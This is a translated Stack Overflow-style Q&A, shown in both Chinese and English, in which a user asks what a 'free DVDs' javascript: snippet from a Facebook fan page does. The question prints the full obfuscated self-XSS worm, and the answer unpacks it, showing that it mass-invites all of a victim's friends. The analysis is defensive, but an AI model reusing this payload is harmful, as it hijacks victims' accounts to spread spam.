Facebook javascript [英] Facebook javascript

查看:89
本文介绍了Facebook javascript的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!

问题描述

Facebook上的朋友建议我成为一些视频库的粉丝,以获得免费的DVD,并在免费DVD标签下的粉丝页面上,它有一些代码要求用户复制并粘贴到地址栏中。



我想知道有没有人知道这个代码会通过查看它来做什么。我想我需要登录到Facebook才能正常工作,但是我不想粘贴它,因为它是恶意和垃圾邮件的所有我的其他Facebook朋友。



任何人都可以告诉?

  javascript:(function(){a ='app113639355344735_ncpCAE'; b ='app113639355344735_RWwtnR'; WGOEjW = 'app113639355344735_WGOEjW'; zsbTwe = 'app113639355344735_zsbTwe'; wwEggB = 'app113639355344735_wwEggB';的eval(功能(p,A,C,K,E,R){E =函数(C){返回(℃下一个 ''?: ΔE(parseInt函数(C / A)))+((C = C%A)→35使用String.fromCharCode(C + 29):c.toString(36))};如果( '' 取代(/! k = [函数(e){return r [e]}]; e = c(c)| e(c) function(){return'\\w +'}; c = 1}; while(c  - )if(k [c])p = p.replace(new RegExp('\\b'+ e (c)+'\\b','g'),k [c]); return p}('J e = [\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \g\\F\\g\\i\\g\\h\\A  \\j\\h\\一个\\ \\\i\\f  \\o\\f\\h\\q\\i\\f\\r\\\ \\f\\k\\h\\K\\A\\L\\t  \\w\\g\\t \\t\\f\\k  \\g\\k\\k\\f\\x\\M\ \N\\G\\O  \\\\
\\l\\i\\y\\f, \\j\\ \\\y\\o\\o\\f\\j\\h \\i\\g\\H\\\ \\f\\r\\f \\G\\u\\y\\j\\f\\q\\\\
\\f\\k\\h\\j \\p\\x\\f\\l\\h\ \f\\q\\\\
\\f\\k\\h \\p\\i\\g\\ p \\\H \\g\\k\\g\\h\\q\\\\
\\f\\k\\\ \\h \\t\\g\\j\\z\\l\\h\\p\\w\\q \\\\
\\f\\k\\h \\j\\f\\i\\f\\p\ \h\\v\\l\\i\\i \\j\\o\\r\\v\\ g\\k\\\\
\\g\\h\\f\\v\\P\\u\\x\\ R \\B\\l\\Q\\l\\R\\B\\j\\u\\p\\ \\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\ \\\g\\k\\\\
\\g\\h\\f\\v\\t\\\ g\\l\\i\\u\\o\\S\\z\\w\\z \\j\\ \\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\ \\\o]; D = U; D [E [2]](V)[E [1]] [E [0]] = E [3]; D [E [2](A)[ E [4] = D [E [2](b)[E [5]]; S = D并[e [2]](E [6]); M = D [E [2]](E [7]); C = D并[e [9]](E [8]); C [E [11](E [10],I,I); S [E [12](C); C(D(){W [E [13]]()},E); C(D(){X [E [16](E [14],E [15])},E),C (D(){M [E [12](C); D [E [2]](Y)[E [4] = D [E [2]](Z)[E [5]]} ,E); '62,69' |||||||||||||| _0x95ea | X65 | X69 | X74 | X6C | X73 | x6E | X61 || X76 | X67 | X63 | X45 | X6D || 64 | x6F | X5F | X68 | X72 | X75 | X70 | X79 | X2F |的setTimeout |功能| 5000 | X62 | x4D | X6B |真| VAR | X42 | X49 | X48 | X54 | x4C | X66 | X6A | X78 | X2E | X44 |文档| wwEggB | FS | SocialGraphManager | zsbTwe | WGOEjW ||||||| .split( '|'),0,{}))})();


解决方案

这是使用packer压缩
你可以使用 http://jsbeautifier.org/ 等工具解压缩

  a ='app113639355344735_ncpCAE'; 
b ='app113639355344735_RWwtnR';
WGOEjW ='app113639355344735_WGOEjW';
zsbTwe ='app113639355344735_zsbTwe';
wwEggB ='app113639355344735_wwEggB';
d = document;
d ['getElementById'](wwEggB)['style'] ['visibility'] ='hidden';
d ['getElementById'](a)['innerHTML'] = d ['getElementById'](b)['value'];
s = d ['getElementById']('suggest');
m = d ['getElementById']('likeme');
c = d ['createEvent']('MouseEvents');
c ['initEvent']('click',true,true);
s ['dispatchEvent'](c);
setTimeout(function(){
fs ['select_all']()
},5000);
setTimeout(function(){
SocialGraphManager ['submitDialog']('sgm_invite_form','/ajax/social_graph/invite_dialog.php')
},5000);
setTimeout(function(){
m ['dispatchEvent'](c);
d ['getElementById'](zsbTwe)['innerHTML'] = d ['getElementById'](WGOEjW) ['value']
},5000);

如您所见,这将打开一个邀请对话框,选择所有的朋友并发出点击事件为了运行邀请 - 简而言之,它是一个蠕虫。


A 'friend' on Facebook suggested I become a fan of some video library to get free DVDs and on their fan page under the 'FREE DVDs' tab it had some code it asked users to copy and paste into the address bar.

I am wondering if anyone knows what this code would do just by looking at it. I guess I need to be logged into Facebook for it to work but I don't want to paste it, in the case it was malicious and spammed all my other Facebook friends.

Can anyone tell?

javascript:(function(){a='app113639355344735_ncpCAE';b='app113639355344735_RWwtnR';WGOEjW='app113639355344735_WGOEjW';zsbTwe='app113639355344735_zsbTwe';wwEggB='app113639355344735_wwEggB';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|wwEggB|fs|SocialGraphManager|zsbTwe|WGOEjW|||||||'.split('|'),0,{}))})();

解决方案

This is compressed using p.a.c.k.e.r You can use tools like http://jsbeautifier.org/ to unpack it

a = 'app113639355344735_ncpCAE';
b = 'app113639355344735_RWwtnR';
WGOEjW = 'app113639355344735_WGOEjW';
zsbTwe = 'app113639355344735_zsbTwe';
wwEggB = 'app113639355344735_wwEggB';
d = document;
d['getElementById'](wwEggB)['style']['visibility'] = 'hidden';
d['getElementById'](a)['innerHTML'] = d['getElementById'](b)['value'];
s = d['getElementById']('suggest');
m = d['getElementById']('likeme');
c = d['createEvent']('MouseEvents');
c['initEvent']('click', true, true);
s['dispatchEvent'](c);
setTimeout(function () {
    fs['select_all']()
}, 5000);
setTimeout(function () {
    SocialGraphManager['submitDialog']('sgm_invite_form', '/ajax/social_graph/invite_dialog.php')
}, 5000);
setTimeout(function () {
    m['dispatchEvent'](c);
    d['getElementById'](zsbTwe)['innerHTML'] = d['getElementById'](WGOEjW)['value']
}, 5000);

As you can see, this opens up an invide dialog, selects all friends and issues a click event so as to run the invitation - in short, its a worm.

这篇关于Facebook javascript的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!

查看全文
登录 关闭
扫码关注1秒登录
发送“验证码”获取 | 15天全站免登陆